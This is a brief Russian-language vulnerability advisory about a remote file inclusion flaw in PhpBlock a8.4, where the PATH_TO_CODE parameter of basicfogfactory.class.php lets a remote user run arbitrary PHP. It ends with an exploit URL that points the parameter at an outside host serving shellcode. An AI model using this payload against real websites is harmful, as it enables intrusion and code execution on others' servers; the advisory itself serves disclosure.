Программа: PhpBlock a8.4
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «PATH_TO_CODE» сценарием basicfogfactory.class.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.
Эксплоит:
http://[site]/[Path]/modules/basicfog/basicfogfactory.class.php? PATH_TO_CODE=http://[ShellCode]